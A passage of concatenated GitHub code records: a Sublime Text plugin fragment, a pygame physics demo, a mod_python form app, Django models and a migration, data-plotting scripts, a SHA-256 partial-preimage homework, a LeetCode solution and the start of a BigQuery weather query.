'/usr/local/bin',\n '/usr/bin'\n ]:\n st2_dir = os.path.expandvars(path)\n result = check_processes(st2_dir)\n if result is not None:\n get_sublime_exe.result = result\n return result\n else:\n st2_dir = '/Applications/Sublime Text 2.app/Contents/SharedSupport/bin'\n result = check_processes(st2_dir)\n if result is not None:\n get_sublime_exe.result = result\n return result\n try:\n folder = check_output(\n ['mdfind', '\"kMDItemCFBundleIdentifier == com.sublimetext.2\"'],\n use_texpath=False\n )\n\n st2_dir = os.path.join(folder, 'Contents', 'SharedSupport', 'bin')\n result = check_processes(st2_dir)\n if result is not None:\n get_sublime_exe.result = result\n return result\n except:\n pass\n\n print(\n 'Cannot determine the path to your Sublime installation. 
Please '\n 'set the \"sublime_executable\" setting in your settings for your '\n 'platform.'\n )\n\n return None\n\n\ndef get_project_file_name(view):\n try:\n return view.window().project_file_name()\n except AttributeError:\n return _get_project_file_name(view)\n\n\n# long, complex hack for ST2 to load the project file from the current session\ndef _get_project_file_name(view):\n try:\n window_id = view.window().id()\n except AttributeError:\n print('Could not determine project file as view does not seem to have an associated window.')\n return None\n\n if window_id is None:\n return None\n\n session = os.path.normpath(\n os.path.join(\n sublime.packages_path(),\n '..',\n 'Settings',\n 'Session.sublime_session'\n )\n )\n\n auto_save_session = os.path.normpath(\n os.path.join(\n sublime.packages_path(),\n '..',\n 'Settings',\n 'Auto Save Session.sublime_session'\n )\n )\n\n session = auto_save_session if os.path.exists(auto_save_session) else session\n\n if not os.path.exists(session):\n return None\n\n project_file = None\n\n # we tell that we have found the current project's project file by\n # looking at the folders registered for that project and comparing it\n # to the open directorys in the current window\n found_all_folders = False\n try:\n with open(session, 'r') as f:\n session_data = f.read().replace('\\t', ' ')\n j = json.loads(session_data, strict=False)\n projects = j.get('workspaces', {}).get('recent_workspaces', [])\n\n for project_file in projects:\n found_all_folders = True\n\n project_file = normalize_path(project_file)\n try:\n with open(project_file, 'r') as fd:\n project_json = json.loads(fd.read(), strict=False)\n\n if 'folders' in project_json:\n project_folders = project_json['folders']\n for directory in view.window().folders():\n found = False\n for folder in project_folders:\n folder_path = normalize_path(folder['path'])\n # handle relative folder paths\n if not os.path.isabs(folder_path):\n folder_path = os.path.normpath(\n os.path.join(os.path.dirname(project_file), folder_path)\n )\n\n if folder_path == directory:\n found = True\n break\n\n if not found:\n found_all_folders = False\n break\n\n if found_all_folders:\n break\n except:\n found_all_folders = False\n except:\n pass\n\n if not found_all_folders:\n project_file = None\n\n if (\n project_file is None or\n not project_file.endswith('.sublime-project') or\n not os.path.exists(project_file)\n ):\n return None\n\n print('Using project file: %s' % project_file)\n return project_file\n\n\n# tokens used to clean-up JSON files\nTOKENIZER = re.compile(r'(? 
0: \n        car_code.move()\n        car_code.draw(screen)\n        \n        car_formula.moveFormula(velocity, time)\n        car_formula.draw(screen)\n\n        # velocity text\n        velocity_text = font.render('velocity_code : {}'.format(round(car_code.getVelocity(), 2)), True, BLACK)\n        screen.blit(velocity_text, pos_velocity_code)\n        formula_text = font.render('velocity_format : {}'.format(round(car_formula.getVelocity(), 2)), True, BLACK)\n        screen.blit(formula_text, pos_velocity_formula)\n\n        # displacement text\n        velocity_text = font.render('displacement_code : {}'.format(round(car_code.getDisplacement(), 2)), True, BLACK)\n        screen.blit(velocity_text, pos_displacement_code)\n        formula_text = font.render('displacement_format : {}'.format(round(car_formula.getDisplacement(), 2)), True, BLACK)\n        screen.blit(formula_text, pos_displacement_formula)\n\n        pygame.display.update()","repo_name":"8BookIt8/Uniformly-Accelerated-Motion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"3212333921","text":"from mod_python import util, Session\r\nfrom engine import *\r\nfrom dbase import *\r\n\r\ndef exe(req, **params):\r\n    \r\n    sess = Session.Session(req)\r\n    if not sess.has_key(\"user\"):\r\n        util.redirect (req, \"/pantoto-research/login.py\")\r\n    user = sess[\"user\"]\r\n\r\n    system = getSystem()\r\n    pagelet=params[\"pagelet\"]\r\n    action=params[\"action\"]\r\n    for i in params:\r\n        if i[0]=='1':\r\n            fieldlabel=i[1:]\r\n            value=params[i]\r\n            system.setFieldByUser(user,pagelet,fieldlabel,value)\r\n    \r\n\r\n    system.executeAction(user,action)\r\n\r\n    setSystem(system)\r\n    util.redirect(req,\"/pantoto-research/runsys.py?pagelet=\"+pagelet)\r\n\r\n\r\n\r\ndef loginverify(req, username):\r\n\r\n    sess = Session.Session(req)\r\n    sess[\"user\"] = username\r\n    sess.save()\r\n    util.redirect(req,\"/pantoto-research/runsys.py\")\r\n\r\ndef logout(req):\r\n    sess = Session.Session(req)\r\n    del sess[\"user\"]\r\n    sess.save()\r\n    util.redirect (req, \"/pantoto-research/login.py\")\r\n\r\ndef index(req, pagelet=\"\"):\r\n\r\n    sess = Session.Session(req)\r\n    if not sess.has_key(\"user\"):\r\n        util.redirect (req, \"/pantoto-research/login.py\")\r\n    user = sess[\"user\"]\r\n    system = getSystem()\r\n\r\n    pagelets = system.getAllPagelets()\r\n    # NOTE: the HTML tags in this function's string literals were lost during\r\n    # extraction (only text and entities survived); the markup below is a\r\n    # minimal reconstruction, kept consistent with the parameter names that\r\n    # exe() parses ('pagelet', 'action', and field inputs prefixed with '1').\r\n    wtop = \"\"\r\n    for i in pagelets:\r\n        wtop = wtop + '<a href=\"runsys.py?pagelet='+i+'\">&nbsp;&bull; '+i+'</a><br>\\n'\r\n    \r\n    if pagelet==\"\":\r\n        pagelet=pagelets.keys()[0]\r\n    pageletname = pagelet + \" pagelet\"\r\n    \r\n\r\n    req.content_type = \"text/html\"\r\n    req.write( \"\"\"\r\n<html>\r\n<head>\r\n<title>Pantoto-Research</title>\r\n</head>\r\n<body>\r\n%s\r\n<p>Logged in as %s</p>\r\n<h3>%s</h3>\r\n<form action=\"runsys.py/exe\" method=\"post\">\r\n<input type=\"hidden\" name=\"pagelet\" value=\"%s\">\r\n\"\"\" %(wtop, user,pageletname,pagelet))\r\n#    req.write(str(system.getCurrentState().getState()))\r\n    if pagelet != \"\":\r\n        context = system.getUserContent(user,pagelet)\r\n        for fieldlabel in context:\r\n            req.write(\"\"\"%s: \"\"\" %(fieldlabel))\r\n            t=\"\"\r\n            if context[fieldlabel][0]=='r':\r\n                t = system.getFieldByUser(user,pagelet,fieldlabel)\r\n                if t==None:\r\n                    t=\"\"\r\n            if context[fieldlabel][1]=='w':\r\n                req.write(\"\"\"<input name=\"1%s\" id=\"%s\" value=\"%s\"><br>\\n\"\"\" %(fieldlabel,fieldlabel,t))\r\n            else:\r\n                req.write(\"\"\"%s<br>\\n\"\"\" %(t))\r\n\r\n    buttons = system.getExec(user)\r\n\r\n    req.write(\"<br>\")\r\n    for button in buttons:\r\n        req.write(\"\"\"<input type=\"submit\" name=\"action\" value=\"%s\">\\n\"\"\" %(button))\r\n\r\n    req.write(\"\"\"\r\n</form>\r\n<hr>\r\n&copy; Pantoto<br>\r\n</body>\r\n</html>
    \r\n\r\n\r\n \"\"\" )\r\n","repo_name":"ankur1990/impl","sub_path":"runsys.py","file_name":"runsys.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19095909503","text":"import json\n\nif __name__ == \"__main__\":\n with open(\"complex_total_residue_counts.json\", \"r\") as handle:\n complex_residues = json.load(handle)\n \n planarity = {}\n with open(\"planarity_results.csv\", \"r\") as handle:\n for line in handle:\n line = line.strip(\"\\n\").split(\",\")\n if line[0] != \"5H7I\":\n planarity[line[0]] = line[1]\n\n planars = [complex_residues[comp] for comp in planarity if planarity[comp] == \"planar\"]\n nonplanars = [complex_residues[comp] for comp in planarity if planarity[comp] == \"nonplanar\"]\n \n\n with open(\"residue_counts_by_planarity.csv\", \"w\") as out:\n out.write(\"planars,nonplanars\")\n out.write(\"\\n\")\n for idx, num in enumerate(planars):\n try:\n out.write(\",\".join([str(num), str(nonplanars[idx])]))\n out.write(\"\\n\")\n except IndexError:\n out.write(\",\".join([str(num), \"NA\"]))\n out.write(\"\\n\")\n\n","repo_name":"wigasper/ddi-planarity","sub_path":"data-aggregation/residue_counts_by_planarity.py","file_name":"residue_counts_by_planarity.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19450360040","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Activity',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('activity_name', models.CharField(max_length=25)),\n ('skill_area', models.CharField(null=True, choices=[('FINANCE', 'Finance'), ('PARENTING', 'Parenting'), ('EMPLOYMENT', 'Employment'), ('FITNESS', 'Fitness')], blank=True, max_length=15)),\n ('month', models.CharField(null=True, choices=[('Jan', 'January'), ('Feb', 'February'), ('Mar', 'March'), ('Apr', 'April'), ('May', 'May'), ('Jun', 'June'), ('Jul', 'July'), ('Aug', 'August'), ('Sep', 'September'), ('Oct', 'October'), ('Nov', 'November'), ('Dec', 'December')], blank=True, max_length=3)),\n ('year', models.PositiveSmallIntegerField(null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Attendance',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('complete_date', models.DateField(null=True, blank=True)),\n ('activity', models.ForeignKey(to='zoom_data.Activity')),\n ],\n ),\n migrations.CreateModel(\n name='Child',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('first_name', models.CharField(null=True, blank=True, max_length=15)),\n ('last_name', models.CharField(null=True, blank=True, max_length=15)),\n ('dob', models.DateField(null=True, blank=True)),\n ('gender', models.CharField(null=True, choices=[('FEMALE', 'Female'), ('MALE', 'Male'), ('ALT', 'Another gender')], blank=True, max_length=6)),\n ('race', models.CharField(null=True, choices=[('AFRICAN_AMERICAN', 'African American'), ('WHITE', 'White'), ('MULTIRACIAL', 'Multiracial'), ('AMER_INDIAN', 'American Indian'), ('PAC_ISLANDER', 'Native Hawaiian or Pacific Islander'), ('ASIAN_AMERICAN', 'Asian American')], blank=True, max_length=16)),\n 
('ethnicity', models.CharField(null=True, choices=[('HISPANIC', 'Hispanic'), ('NON-HISPANIC', 'Non-Hispanic')], blank=True, max_length=12)),\n ],\n ),\n migrations.CreateModel(\n name='ChildAttendance',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('complete_date', models.DateField(null=True, blank=True)),\n ('activity', models.ForeignKey(to='zoom_data.Activity')),\n ('child', models.ForeignKey(to='zoom_data.Child')),\n ],\n ),\n migrations.CreateModel(\n name='Contact',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('resident_phone', models.CharField(null=True, blank=True, max_length=10)),\n ('resident_email', models.EmailField(null=True, blank=True, max_length=254)),\n ('permission_text', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_photo', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_email', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_call', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_mail', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_facebook', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('contact_pref', models.CharField(null=True, choices=[('Mail', 'MAIL'), ('Facebook', 'FACEBOOK'), ('Text', 'TEXT'), ('Email', 'EMAIL'), ('Call', 'CALL')], blank=True, max_length=8)),\n ('date_updated', models.DateTimeField(null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Goal',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('goal_name', models.CharField(max_length=100)),\n ('goal_date', models.DateField(null=True, blank=True)),\n ('goal_explain', models.TextField(blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Household',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('household_name', models.CharField(null=True, blank=True, max_length=20)),\n ('unit_num', models.PositiveSmallIntegerField(null=True, blank=True)),\n ('unit_type', models.CharField(null=True, choices=[('SUPPORTIVE', 'Supportive Housing'), ('MARIF', 'MARIF'), ('STUDIO', 'Studio')], blank=True, max_length=10)),\n ],\n ),\n migrations.CreateModel(\n name='Progress',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('date_progress', models.DateField(help_text='Please use the following format: YYYY-MM-DD.')),\n ('percent_progress', models.CharField(choices=[('less than 25%', 'less than 25%'), ('25%', '25%'), ('50%', '50%'), ('75%', '75%'), ('100%', '100%')], default='less than 25%', blank=True, max_length=13)),\n ('notes_progress', models.TextField(blank=True)),\n ('goal', models.ForeignKey(to='zoom_data.Goal')),\n ],\n ),\n migrations.CreateModel(\n name='Resident',\n fields=[\n ('resident_id', models.AutoField(serialize=False, primary_key=True)),\n ('resident_first_name', models.CharField(max_length=20)),\n ('resident_last_name', models.CharField(max_length=20)),\n ('resident_move_in', models.DateField(help_text='Please use the following format: YYYY-MM-DD.')),\n ('gender', models.CharField(null=True, 
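# [Editor's aside -- not part of any dataset record] The residue-count CSV
# record earlier pairs two unequal-length lists via try/except IndexError; the
# standard library offers a direct equivalent (illustrative sketch only):
#     from itertools import zip_longest
#     for p, n in zip_longest(planars, nonplanars, fillvalue="NA"):
#         out.write("{},{}\n".format(p, n))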
choices=[('FEMALE', 'Female'), ('MALE', 'Male'), ('ALT', 'Another gender')], blank=True, max_length=6)),\n                ('race', models.CharField(null=True, choices=[('AFRICAN_AMERICAN', 'African American'), ('WHITE', 'White'), ('MULTIRACIAL', 'Multiracial'), ('AMER_INDIAN', 'American Indian'), ('PAC_ISLANDER', 'Native Hawaiian or Pacific Islander'), ('ASIAN_AMERICAN', 'Asian American')], blank=True, max_length=16)),\n                ('ethnicity', models.CharField(null=True, choices=[('HISPANIC', 'Hispanic'), ('NON-HISPANIC', 'Non-Hispanic')], blank=True, max_length=12)),\n                ('health_ins', models.CharField(null=True, choices=[('NONE', 'None'), ('PRIVATE', 'Private'), ('MEDICAID', 'Medicaid'), ('OTHER', 'Other Insurance')], blank=True, max_length=8)),\n                ('resident_exit', models.DateField(null=True, help_text='Please use the following format: YYYY-MM-DD.', blank=True)),\n                ('household', models.ForeignKey(null=True, to='zoom_data.Household', blank=True)),\n            ],\n        ),\n        migrations.AddField(\n            model_name='goal',\n            name='goal_resident',\n            field=models.ForeignKey(to='zoom_data.Resident'),\n        ),\n        migrations.AddField(\n            model_name='contact',\n            name='contact_resident',\n            field=models.ForeignKey(to='zoom_data.Resident'),\n        ),\n        migrations.AddField(\n            model_name='child',\n            name='household',\n            field=models.ForeignKey(null=True, to='zoom_data.Household', blank=True),\n        ),\n        migrations.AddField(\n            model_name='attendance',\n            name='resident',\n            field=models.ForeignKey(to='zoom_data.Resident'),\n        ),\n        migrations.AddField(\n            model_name='activity',\n            name='children',\n            field=models.ManyToManyField(through='zoom_data.ChildAttendance', to='zoom_data.Child'),\n        ),\n        migrations.AddField(\n            model_name='activity',\n            name='members',\n            field=models.ManyToManyField(through='zoom_data.Attendance', to='zoom_data.Resident'),\n        ),\n    ]\n","repo_name":"5klynna5/zoom_c","sub_path":"zoom_data/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"28307454037","text":"def prefixo(p1, p2):\n\tif len(p1) > len(p2):\n\t\treturn False\n\ti = 0\n\twhile i < len(p1):\n\t\tif p1[i] != p2[i]:\n\t\t\treturn False\n\t\ti += 1\n\treturn True\n\ndef ler():\n\tp1 = input('Enter the first phrase: ').strip()\n\tp2 = input('Enter the second phrase: ').strip()\n\treturn p1, p2\n\np1, p2 = ler()\nif prefixo(p1, p2):\n\tprint('It is a substring')\nelse:\n\tprint('It is not a substring')","repo_name":"argosmaia/UERJ-python","sub_path":"substrings.py","file_name":"substrings.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"70036296052","text":"from IPython.core.interactiveshell import InteractiveShell\nfrom wordcloud import WordCloud, STOPWORDS\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\nimport matplotlib  # added: needed below for matplotlib.rcParams\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport geopandas\nimport functools\nfrom bokeh.palettes import d3\n\nfrom loguru import logger\nfrom GEN_Utils import FileHandling\nfrom GEN_Utils.HDF5_Utils import hdf_to_dict\n\nlogger.info('Import OK')\n\ninput_path = 'analysis_results/summary_stats/summary_stats.xlsx'\noutput_folder = 'images/'\n\nif not os.path.exists(output_folder):\n    os.mkdir(output_folder)\n\n# Print all lone variables during execution\nInteractiveShell.ast_node_interactivity = 'all'\n# Set plotting backgrounds to white\n# (removed an update from _VSCode_defaultMatplotlib_Params, a variable injected\n# by the VS Code notebook runtime that is undefined when run as a script)\nmatplotlib.rcParams.update({'figure.facecolor': (1, 1, 1, 1)})\n\n# Retrieve summary stats from the Excel workbook (one DataFrame per sheet)\nraw_data = pd.read_excel(input_path, sheet_name=None)\nraw_data.keys()\n\nstate_summary = raw_data['state_summary']\nstate_summary = state_summary.drop(\n    [col for col in state_summary.columns.tolist() if 'Unnamed' in col], axis=1)\n\n# import spatial data\n# set the filepath and load in a shapefile\ninput_path = 'raw_data/australian_states.geo.json'\nmap_df = geopandas.read_file(input_path)\n# check data type so we can see that this is not a normal dataframe, but a GEOdataframe\nmap_df.head()\n# map_df.plot()\n\n# Clean map df for plotting funding rate\nstate_mapper = {'Australian Capital Territory': 'ACT', 'New South Wales': 'NSW', 'Northern Territory': 'NT', 'Queensland': 'QLD', 'South Australia': 'SA', 'Tasmania': 'TAS', 'Victoria': 'VIC', 'Western Australia': 'WA'}\n\nfor_plotting = map_df.copy()\nfor_plotting['state'] = for_plotting['STATE_NAME'].map(state_mapper)\n\n# Add columns for each year funded rate\nyear_dict = {}\nfor year, df in state_summary.groupby('Year'):\n    small_df = df[['State and Territory', 'Funded Rate', 'Funded']]\n    small_df['Funded Rate'] = small_df['Funded Rate'] * 100\n    small_df.columns = ['state', f'{year}_rate', f'{year}_funded']\n    year_dict[year] = small_df\n\nmerged_df = functools.reduce(lambda left, right: pd.merge(left, right, on='state', how='outer'), list(year_dict.values()))\n\nfor_plotting = pd.merge(for_plotting, merged_df, on='state', how='outer')\n\nfor_plotting['coords'] = for_plotting['geometry'].apply(lambda x: x.representative_point().coords[:])\nfor_plotting['coords'] = [coords[0] for coords in for_plotting['coords']]\nfor_plotting.reset_index(inplace=True)\n\noptimised_coords = for_plotting[['state', 'coords']].copy()\noptimised_coords[['x', 'y']] = pd.DataFrame(optimised_coords['coords'].tolist(), index=optimised_coords.index)\noptimised_coords = optimised_coords.set_index('state').drop('coords', axis=1).T\n\noptimised_coords['VIC'] = optimised_coords['VIC'] + [-1, -1]\noptimised_coords['TAS'] = optimised_coords['TAS'] + [-0.5, -0.5]\noptimised_coords['SA'] = optimised_coords['SA'] + [-3, 2]\noptimised_coords['QLD'] = optimised_coords['QLD'] + [0, -2]\noptimised_coords = optimised_coords.T\n\n\n# set the range for the choropleth\nvmin, vmax = 0, 50\n# Set up the plot\n# year = '2016'\nsns.palplot(sns.light_palette('darkblue'))\ncmap = sns.light_palette('darkblue', as_cmap=True)\ncmap='BuGn'\n\nyears = state_summary['Year'].unique()\nfor year in years:\n    year\n    # create figure and axes for Matplotlib\n    fig, ax = plt.subplots(1, figsize=(10, 6))\n    for_plotting.plot(column=f'{year}_rate', cmap=cmap, linewidth=0.8, ax=ax, edgecolor='0.8')\n    # remove the axis\n    ax.axis('off')\n    # add a title\n    ax.set_title(f'Number of funded applications per state - {year}', loc='left',\n                 fontdict={'fontsize': 15, 'fontweight': 'bold'})\n    # Add annotation for number funded\n    for state, row in for_plotting.set_index('state').iterrows():\n        plt.annotate(for_plotting.set_index('state').loc[state, f'{year}_funded'], xy=(\n            optimised_coords.loc[state, 'x'], optimised_coords.loc[state, 'y']), fontsize=15, fontweight='bold')\n\n    # create an annotation for the data source\n    # ax.annotate('Source: NHMRC, 2019', xy=(0.1, .08), xycoords='figure fraction',\n    #             horizontalalignment='left', verticalalignment='top', fontsize=12, color='#555555')\n    # ax.annotate(year, xy=(0.15, 0.8), xycoords='figure fraction',\n    # 
horizontalalignment='left', verticalalignment='top', fontsize=15, color='black', style='italic', fontweight='bold')\n\n # Create colorbar as a legend\n sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin, vmax=vmax))\n # empty array for the data range\n sm._A = []\n # add the colorbar to the figure\n cbar = fig.colorbar(sm)\n cbar.set_label('Proportion of applications funded (%)',\n rotation=270, labelpad=20, fontsize=12)\n fig.savefig(f'{output_folder}{year}_per_state.png', dpi=300)\n","repo_name":"dezeraecox/Investigator-Grants-2019","sub_path":"analysis_scripts/plot_states.py","file_name":"plot_states.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42401189955","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# 1. Partial preimages\n# Use a brute-force algorithm to find a partial preimage.\n# Using the template “hash_preimage.py” write a function called “hash_preimage” that takes a single input, target_string, where target_string is a string of bits. The function “hash_preimage” should return a single variable x such that the trailing bits of SHA256(x) matches the target string (not the hash of the target string).\n# Your algorithm should be randomized, i.e., hash_preimage(target_string) should not always return the same partial preimage\n# \n# Example: If our target string was 101 and the hash(x)=01000101 then this would be a match because the least significant bits (rightmost) completely match the target string.\n# \n\n# In[1]:\n\n\nimport hashlib\nimport os\nimport string\nimport random\n\n\n# In[2]:\n\n\ndef randomString(N):\n return ''.join(random.choice(string.ascii_lowercase + ' ') for i in range(N))\n \n\n\n# In[3]:\n\n\ndef hash_preimage(target_string):\n if not all( [x in '01' for x in target_string ] ):\n print( \"Input should be a string of bits\" )\n return\n nonce = b'\\x00'\n \n N=1000000\n n=1000\n k=len(target_string)\n \n x_int = random.randint(1, n)\n msg_bytes = target_string.encode('utf-8')\n \n \n # while True:\n for i in range(N):\n x_int = x_int+1\n x_str = str(x_int)\n x_binary = bin(int(hashlib.sha256(x_str.encode('utf-8')).hexdigest(),16))\n last_k_digits = x_binary[-k:]\n \n if str(last_k_digits) == target_string:\n return(x_str)\n \n return( nonce )\n\n\n# In[4]:\n\n\ntarget_string = \"1011111\"\nmyx = hash_preimage(target_string)\n\n\n# In[8]:\n\n\nbin(int(hashlib.sha256(myx.encode('utf-8')).hexdigest(),16))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ambercyang/mcit582hw2_hash_preimage","sub_path":"hash_preimage.py","file_name":"hash_preimage.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9048743363","text":"from collections import Counter\n\nfrom django.db import models\n\n\nclass GameManager(models.Manager):\n def start_data(self):\n start_actions = Counter()\n start_actions_wins = Counter()\n start_logs = [g.gamelog_set.filter(number=0).first() for g in self.all()]\n for log in start_logs:\n if not log:\n continue\n for line in log.text.split(\"\\n\"):\n if not line.startswith(\"action:\"):\n continue\n _, action = line.split(\":\")\n action = action.strip()\n start_actions[action] += 1\n\n win_gp = log.game.gameplayer_set.filter(winner=True).first()\n if win_gp and win_gp.player == log.player:\n start_actions_wins[action] += 1\n\n print(start_actions)\n print(start_actions_wins)\n for key in start_actions:\n print(key, 
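# [Editor's aside -- not part of any dataset record] On the partial-preimage
# record above: matching k trailing bits of SHA-256 succeeds with probability
# 2**-k per attempt, so about 2**k hash evaluations are expected (k=7 -> ~128).
# A sketch that avoids bin()'s '0b' prefix when reading trailing bits:
#     digest = int.from_bytes(hashlib.sha256(x_str.encode()).digest(), 'big')
#     last_k_digits = format(digest, '0256b')[-k:]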
start_actions_wins[key] / start_actions[key])\n\n        second_actions = Counter()\n        second_actions_wins = Counter()\n        second_logs = [g.gamelog_set.filter(number=1).first() for g in self.all()]\n        for log in second_logs:\n            if not log:\n                continue\n            for line in log.text.split(\"\\n\"):\n                if not line.startswith(\"action:\"):\n                    continue\n                _, action = line.split(\":\")\n                action = action.strip()[:2]\n                second_actions[action] += 1\n\n                win_gp = log.game.gameplayer_set.filter(winner=True).first()\n                if win_gp and win_gp.player == log.player:\n                    second_actions_wins[action] += 1\n\n        print(second_actions)\n        print(second_actions_wins)\n        for key in second_actions:\n            print(key, second_actions_wins[key] / second_actions[key])\n\n\nclass Game(models.Model):\n    players = models.ManyToManyField(\"Player\", through=\"GamePlayer\")\n    worker = models.ForeignKey(\"Worker\", on_delete=models.PROTECT)\n\n    initial_state = models.TextField()\n\n    start_timestamp = models.DateTimeField(auto_now_add=True)\n    end_timestamp = models.DateTimeField(null=True)\n\n    objects = GameManager()\n\n    class Status(models.TextChoices):\n        IN_PROGRESS = \"I\"\n        COMPLETED = \"C\"\n        DEPTH_OUT = \"D\"\n        ERROR = \"E\"\n        ABANDONED = \"A\"\n\n    status = models.CharField(\n        max_length=1,\n        choices=Status.choices,\n        default=Status.IN_PROGRESS,\n    )\n\n    @property\n    def start_data(self):\n        return {\n            \"game_id\": self.id,\n            \"players\": [\n                {\n                    \"number\": game_player.number,\n                    \"id\": game_player.player.id,\n                    \"repository\": game_player.player.repository,\n                    \"commit\": game_player.player.commit,\n                    \"invocation\": game_player.player.invocation,\n                }\n                for game_player in self.gameplayer_set.order_by(\"number\")\n            ],\n            \"state\": self.initial_state,\n        }\n\n    def add_player(self, player):\n        GamePlayer.objects.create(game=self, player=player, number=self.players.count())\n\n    def max_state_repititions(self):\n        states = [log.state for log in self.gamelog_set.all()]\n        counts = Counter()\n        for state in states:\n            counts[state] += 1\n        return max(counts.values())\n\n    def matchups(self):\n        pass\n\n    def __str__(self):\n        return f\"{self.worker} {self.status} {self.start_timestamp}\"\n\n\nclass GameLog(models.Model):\n    game = models.ForeignKey(\"Game\", on_delete=models.CASCADE)\n    player = models.ForeignKey(\"Player\", on_delete=models.PROTECT)\n    number = models.IntegerField()\n    state = models.TextField()\n    text = models.TextField()\n\n\nclass GamePlayer(models.Model):\n    game = models.ForeignKey(\"Game\", on_delete=models.CASCADE)\n    player = models.ForeignKey(\"Player\", on_delete=models.PROTECT)\n\n    number = models.IntegerField()\n    winner = models.BooleanField(default=False)\n\n    def opponent(self):\n        # fixed: was a bare 'gameplayer_set' (NameError); the opponent is the\n        # other GamePlayer attached to the same game\n        return [gp for gp in self.game.gameplayer_set.all() if gp != self][0]\n\n    def __str__(self):\n        return f\"{self.game} player {self.number + 1}\"\n\n\nclass Player(models.Model):\n    name = models.TextField(null=True, blank=True)\n    repository = models.TextField()\n    commit = models.CharField(max_length=40)\n    invocation = models.TextField()\n\n    def __str__(self):\n        return self.name or f\"Player #{self.id}\"\n\n\nclass Request(models.Model):\n    player = models.ForeignKey(\n        \"Player\", on_delete=models.CASCADE, related_name=\"request_set\"\n    )\n    opponent = models.ForeignKey(\n        \"Player\",\n        on_delete=models.CASCADE,\n        blank=True,\n        null=True,\n        related_name=\"request_opponent_set\",\n    )\n    number = models.IntegerField(default=1)\n\n\nclass Worker(models.Model):\n    name = models.TextField()\n    first_checkin = models.DateTimeField(auto_now_add=True)\n    last_checkin = 
models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.name\n","repo_name":"richardjs/arthur","sub_path":"arthur/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18220906382","text":"class Solution:\n def findMinimumTime(self, tasks: List[List[int]]) -> int:\n kMax = 2000\n running = [False] * (kMax + 1)\n\n # Sort tasks by end.\n for start, end, duration in sorted(tasks, key=lambda x: x[1]):\n neededDuration = duration - \\\n sum(running[i] for i in range(start, end + 1))\n # Greedily run the task as late as possible so that later tasks can run\n # simultaneously.\n i = end\n while neededDuration > 0:\n if not running[i]:\n running[i] = True\n neededDuration -= 1\n i -= 1\n\n return sum(running)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/2589. Minimum Time to Complete All Tasks/2589.py","file_name":"2589.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"4672928603","text":"import argparse\nimport csv\nimport time\nimport uuid\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom oauth2client.client import GoogleCredentials\n\nquery_template = '''\nSELECT\n stn.id,\n stn.name,\n stn.latitude,\n stn.longitude,\n date,\n MAX(prcp) AS prcp,\n MAX(tmin) AS tmin,\n MAX(tmax) AS tmax\nFROM\n [bigquery-public-data:ghcn_d.ghcnd_stations] as stn\nJOIN\n (SELECT\n id,\n STRING(wx.date) AS date,\n IF (wx.element = 'PRCP', wx.value/10, NULL) AS prcp,\n IF (wx.element = 'TMIN', wx.value/10, NULL) AS tmin,\n IF (wx.element = 'TMAX', wx.value/10, NULL) AS 